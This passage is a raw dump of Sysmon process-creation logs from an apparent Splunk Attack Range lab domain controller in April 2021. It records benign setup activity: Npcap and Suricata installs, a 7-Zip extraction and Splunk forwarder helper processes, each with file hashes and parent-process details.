driver installation toolNpcapInsecure.Com LLC.NPFInstall.exe"C:\Program Files\Npcap\NPFInstall.exe" -n -iwC:\Windows\system32\Npcap\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69A87CA4D06087A36AF2C26CFAC3E705,SHA256=94DBF270AE479A2AE2F61F7B2C573BC7D6CB787F264B9178654A3AF2A66244CA,IMPHASH=596D8DB0DE29AE6D4AACEFE8943C3DD2{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe"C:\temp\npcap.exe" 154100x800000000000000018717Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:40.694{A8622C2F-4384-6078-2605-00000000AE01}5048C:\Windows\System32\pnputil.exe10.0.14393.2758 (rs1_release_1.190104-1904)Microsoft PnP Utility - Tool to add, delete, export, and enumerate driver packages.Microsoft® Windows® Operating SystemMicrosoft Corporationpnputil.exepnputil.exe -eC:\Windows\system32\Npcap\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0523245FA9B7DAFF739C1C42C1143976,SHA256=D11EA7611A503979C30531EB7F8E5C6F75C874B09B590F8F6B12DA84F6272FA2,IMPHASH=502259F6F2B32E4AAAB4CD630C18D3DD{A8622C2F-4384-6078-2405-00000000AE01}6296C:\Program Files\Npcap\NPFInstall.exe"C:\Program Files\Npcap\NPFInstall.exe" -n -c 154100x800000000000000018704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:40.607{A8622C2F-4384-6078-2405-00000000AE01}6296C:\Program Files\Npcap\NPFInstall.exe1.20A LWF & WFP driver installation toolNpcapInsecure.Com LLC.NPFInstall.exe"C:\Program Files\Npcap\NPFInstall.exe" -n -cC:\Windows\system32\Npcap\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69A87CA4D06087A36AF2C26CFAC3E705,SHA256=94DBF270AE479A2AE2F61F7B2C573BC7D6CB787F264B9178654A3AF2A66244CA,IMPHASH=596D8DB0DE29AE6D4AACEFE8943C3DD2{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe"C:\temp\npcap.exe" 154100x800000000000000018603Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:39.662{A8622C2F-4383-6078-2205-00000000AE01}3368C:\Users\ADMINI~1\AppData\Local\Temp\nsnE683.tmp\NPFInstall.exe1.20A LWF & WFP driver installation toolNpcapInsecure.Com LLC.NPFInstall.exe"C:\Users\ADMINI~1\AppData\Local\Temp\nsnE683.tmp\NPFInstall.exe" -n -check_dllC:\Users\ADMINI~1\AppData\Local\Temp\nsnE683.tmp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69A87CA4D06087A36AF2C26CFAC3E705,SHA256=94DBF270AE479A2AE2F61F7B2C573BC7D6CB787F264B9178654A3AF2A66244CA,IMPHASH=596D8DB0DE29AE6D4AACEFE8943C3DD2{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe"C:\temp\npcap.exe" 154100x800000000000000018563Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:36.021{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe1.20Npcap 1.20 installerNpcap--"C:\temp\npcap.exe" C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=BBBF876AA41436386AB2F930CD699BC9,SHA256=EF8113E595694A14D35BD31043ED6EA73AC5793CF53985AE950F4E65B406E363,IMPHASH=572D74F42CB043F2E4F09743EC7480B5{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000018440Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:27.817{A8622C2F-4377-6078-1F05-00000000AE01}5628C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\system32\msiexec.exe /VC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000018425Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:27.663{A8622C2F-4377-6078-1E05-00000000AE01}3540C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exe"C:\Windows\system32\msiexec.exe" /i c:\temp\Suricata.msi /l*v c:\temp\suricataInstallLog.txt /qnC:\Program Files\SplunkUniversalForwarder\etc\apps\TA-suricata-4\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-4359-6078-1605-00000000AE01}2596C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Program Files\SplunkUniversalForwarder\etc\apps\TA-suricata-4\suricata.ps1" 154100x800000000000000018409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:26.342{A8622C2F-4376-6078-1D05-00000000AE01}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018398Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:24.749{A8622C2F-4374-6078-1C05-00000000AE01}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018382Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:24.217{A8622C2F-4374-6078-1B05-00000000AE01}5732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:23.545{A8622C2F-4373-6078-1A05-00000000AE01}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018361Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:22.311{A8622C2F-4372-6078-1905-00000000AE01}3036C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018350Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:21.624{A8622C2F-4371-6078-1805-00000000AE01}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018339Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:21.123{A8622C2F-4371-6078-1705-00000000AE01}6528C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018209Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:57.525{A8622C2F-4359-6078-1605-00000000AE01}2596C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe10.0.14393.4046 (rs1_release.201028-1803)Windows PowerShell ISEMicrosoft® Windows® Operating SystemMicrosoft Corporationpowershell_ise.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Program Files\SplunkUniversalForwarder\etc\apps\TA-suricata-4\suricata.ps1"C:\Program Files\SplunkUniversalForwarder\etc\apps\TA-suricata-4\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=FEBDA520271B683CD518B3425EC585D4,SHA256=8CFAC3F204DF864A5E9D9E20A4E7D4D70CB30A146661D0F7447A927BE74F7F04,IMPHASH=00000000000000000000000000000000{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000018042Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:26.343{A8622C2F-433A-6078-1505-00000000AE01}5672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018030Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:24.874{A8622C2F-4338-6078-1405-00000000AE01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018020Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:24.203{A8622C2F-4338-6078-1305-00000000AE01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018010Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:23.531{A8622C2F-4337-6078-1205-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017995Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:22.468{A8622C2F-4336-6078-1105-00000000AE01}6296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:21.796{A8622C2F-4335-6078-1005-00000000AE01}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017973Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:21.125{A8622C2F-4335-6078-0F05-00000000AE01}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017902Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:46.468{A8622C2F-4312-6078-0E05-00000000AE01}6364C:\Program Files\7-Zip\7zG.exe19.007-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Program Files\SplunkUniversalForwarder\etc\apps\" -an -ai#7zMap1146:140:7zEvent17959C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=04FB3AE7F05C8BC333125972BA907398,SHA256=2FB898BACB587F2484C9C4AA6DA2729079D93D1F923A017BB84BEEF87BF74FEF,IMPHASH=9CF6F80DD6DFE9900700C1E11C318B2A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000017814Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:26.313{A8622C2F-42FE-6078-0D05-00000000AE01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017803Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:24.844{A8622C2F-42FC-6078-0C05-00000000AE01}3372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017793Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:24.173{A8622C2F-42FC-6078-0B05-00000000AE01}6236C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017783Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:23.501{A8622C2F-42FB-6078-0A05-00000000AE01}796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017774Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:22.438{A8622C2F-42FA-6078-0905-00000000AE01}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017756Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:21.766{A8622C2F-42F9-6078-0805-00000000AE01}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017745Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:21.094{A8622C2F-42F9-6078-0705-00000000AE01}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017724Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:20.259{A8622C2F-42F8-6078-0605-00000000AE01}6280C:\Windows\System32\InstallAgent.exe10.0.14393.4169 (rs1_release.210107-1130)InstallAgentMicrosoft® Windows® Operating SystemMicrosoft CorporationInstallAgent.exeC:\Windows\System32\InstallAgent.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=88C7DCDD735B31E4F5620E4B9F38C87F,SHA256=5EF1322B96F176C4EA4B8304CAF8B45E2E42C3188AA82ED1FD6196AFC04B7297,IMPHASH=EAB6EF3DE625719627DC808B5F0501FC{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000017578Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:26.299{A8622C2F-42C2-6078-0405-00000000AE01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017568Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:24.971{A8622C2F-42C0-6078-0305-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017551Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:24.299{A8622C2F-42C0-6078-0205-00000000AE01}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 